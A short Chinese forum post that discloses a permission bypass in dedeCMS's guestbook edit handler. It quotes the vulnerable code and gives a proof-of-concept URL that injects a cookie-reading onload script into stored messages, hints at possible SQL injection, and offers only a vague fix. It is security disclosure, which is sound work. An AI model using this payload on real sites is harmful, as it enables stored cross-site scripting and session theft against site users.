dedeCMS留言权限绕过导致跨站攻击及修复
2771 点击·0 回帖
灯火互联
楼主
 |  | |
 | dedeCMS某处由于权限绕过可导致跨站脚本攻击 首先是/plus/guestbook.php 图片:20121109105648413.gif  action=admin然后来到/guestbook/edit.inc.php 图片:20121109105648103.gif  else if($job=='editok')//这里没有判断$g_isadmin { $remsg = trim($remsg); 略 $dsql->ExecuteNoneQuery("update `#@__guestbook` set `msg`='$msg', `posttime`='".time()."' where id='$id' ");//而这里没有过滤,可以写代码了…… ShowMsg("成功更改或回复一条留言!",$GUEST_BOOK_POS); exit(); } http://www.xxx.com/plus/guestbook.php?action=admin;job=editok;id=100;msg=<body onload=alert(document.cookie)> 这个id,可以在[回复/编辑]这个按钮处看到 仔细试试没准还能试出注入呢。。。。 图片:20121109105648376.jpg  图片:20121109105649923.jpg  图片:20121109105649926.jpg  修复方案: 权限啊,过滤啊,自己看着办吧 | |
 |  |